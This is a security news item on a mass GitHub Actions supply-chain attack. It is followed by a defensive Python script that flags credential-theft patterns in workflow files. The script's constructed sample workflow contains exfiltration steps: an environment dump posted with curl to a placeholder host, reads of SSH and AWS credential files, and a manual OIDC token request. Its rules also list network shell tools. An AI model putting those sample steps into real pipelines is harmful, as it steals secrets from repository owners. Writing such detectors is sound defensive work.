Megalodon supply-chain attack hit more than 5,500 GitHub repositories.

24.05.2026


Source: www.stepsecurity.io

Researchers disclosed a mass CI/CD attack called Megalodon, in which attackers pushed 5,718 malicious commits into 5,561 GitHub repositories in about six hours. The malicious workflows were designed to steal cloud credentials, SSH keys, GitHub tokens, and OIDC tokens from build pipelines. The key lesson is that attackers increasingly target the pipeline rather than the application code itself: a commit that edits a workflow file is code execution inside the repository's CI context, where both stored secrets and the runner's OIDC token endpoint are reachable from any step. Workflow changes therefore deserve the same review as application code, and the GITHUB_TOKEN granted to a run should carry only the permissions the job needs.
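The following is an added triage script, not code from the report or from StepSecurity. It walks a GitHub Actions workflow file line by line (no YAML library required) and flags the patterns a reviewer would look for when auditing workflows after a mass malicious-commit incident of the kind described above: third-party actions not pinned to a commit SHA, a `write-all` GITHUB_TOKEN, untrusted pull-request code checked out into a job that has secrets, and run steps that dump the environment, read SSH or cloud credential files, request an OIDC token by hand, or push data off the runner. The rule set is an assumption about what "suspicious" looks like, and both workflow samples are constructed for the example.

```python
"""Regex triage of GitHub Actions workflows for pipeline credential-theft patterns.
Added example; the rules are assumptions to tune, and the samples are constructed."""
import re

SHA40 = re.compile(r"^[0-9a-f]{40}$")
USES = re.compile(r"^\s*-?\s*uses:\s*(\S+)")
RUN = re.compile(r"^\s*-?\s*run:\s*(.*)$")
PERMISSIONS = re.compile(r"^\s*permissions:\s*(\S*)")
PR_TARGET = re.compile(r"^\s*pull_request_target\s*:")
HEAD_REF = re.compile(r"^\s*ref:\s*.*pull_request\.head")

# Shell fragments that read or move credential material (assumed indicators).
SCRIPT_RULES = [
    ("env-dump", r"\b(printenv|env)\b(?!\s*[:=])", "dumps the process environment, where secrets live"),
    ("oidc-token-request", r"ACTIONS_ID_TOKEN_REQUEST_(URL|TOKEN)", "requests an OIDC token by hand"),
    ("credential-files", r"~/\.(ssh|aws|azure|config/gcloud)\b|/\.ssh/|/\.aws/", "reads SSH or cloud credential files"),
    ("secrets-in-shell", r"\$\{\{\s*secrets\.", "interpolates a secret into a shell command"),
    ("github-token-in-shell", r"\$\{?GITHUB_TOKEN\}?", "uses GITHUB_TOKEN directly in shell"),
    ("network-egress", r"\b(curl|wget|nc|ncat)\b.*(https?://|\b\d{1,3}(\.\d{1,3}){3}\b)", "network egress from a run step"),
    ("encoding", r"\b(base64|xxd)\b", "encodes data, common right before exfiltration"),
]
COMPILED = [(rid, re.compile(pat), why) for rid, pat, why in SCRIPT_RULES]


def _check_script(lineno, script, findings):
    for rid, rx, why in COMPILED:
        if rx.search(script):
            findings.append({"line": lineno, "rule": rid, "detail": why})


def scan_workflow(text):
    """Return a list of {line, rule, detail} findings for one workflow file."""
    findings, on_pr_target, script_indent = [], False, None
    for lineno, line in enumerate(text.splitlines(), start=1):
        indent = len(line) - len(line.lstrip())
        if script_indent is not None:  # inside a `run: |` block: deeper-indented lines are shell
            if not line.strip() or indent > script_indent:
                _check_script(lineno, line, findings)
                continue
            script_indent = None
        if PR_TARGET.match(line):
            on_pr_target = True
            findings.append({"line": lineno, "rule": "pull-request-target",
                             "detail": "PR-triggered run has access to secrets"})
        if on_pr_target and HEAD_REF.match(line):
            findings.append({"line": lineno, "rule": "pr-head-checkout-with-secrets",
                             "detail": "untrusted PR code checked out into a privileged job"})
        m = PERMISSIONS.match(line)
        if m and m.group(1) == "write-all":
            findings.append({"line": lineno, "rule": "write-all-permissions",
                             "detail": "GITHUB_TOKEN granted write to everything"})
        m = USES.match(line)
        if m and not m.group(1).startswith(("./", "docker://")):  # local/docker refs have no pin
            parts = m.group(1).split("@", 1)
            if len(parts) != 2 or not SHA40.match(parts[1]):
                findings.append({"line": lineno, "rule": "unpinned-action",
                                 "detail": f"{m.group(1)} is not pinned to a commit SHA"})
        m = RUN.match(line)
        if m:
            cmd = m.group(1).strip()
            if cmd in ("|", "|-", "|+", ">", ">-", ">+"):
                script_indent = indent  # block scalar: script follows on the next lines
            else:
                _check_script(lineno, cmd, findings)
    return findings


# Constructed sample: a workflow edited to harvest credentials from the runner.
SAMPLE_WORKFLOW = """\
name: ci
on:
  pull_request_target:
    types: [opened, synchronize]
permissions: write-all
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - uses: actions/setup-node@0123456789abcdef0123456789abcdef01234567  # placeholder pin
      - name: Build
        run: npm ci && npm test
      - name: Cache warmup
        run: |
          printenv | base64 -w0 > /tmp/e
          curl -s -X POST -d @/tmp/e https://example.invalid/collect
          cat ~/.ssh/id_rsa ~/.aws/credentials 2>/dev/null | base64 -w0
          curl -s -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" "$ACTIONS_ID_TOKEN_REQUEST_URL"
"""

# Constructed sample: the same job with a pinned action, read-only token and a push trigger.
CLEAN_WORKFLOW = """\
name: ci
on:
  push:
    branches: [main]
permissions:
  contents: read
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567  # placeholder pin
      - run: npm ci && npm test
"""

if __name__ == "__main__":
    for f in scan_workflow(SAMPLE_WORKFLOW):
        print(f"line {f['line']:>3}  {f['rule']:<30} {f['detail']}")
```

Run it over every file under `.github/workflows/` in the commit range you are investigating; the `encoding` and `network-egress` rules are noisy on their own, so treat a step that trips them together with `env-dump`, `credential-files` or `oidc-token-request` as the signal worth a human look.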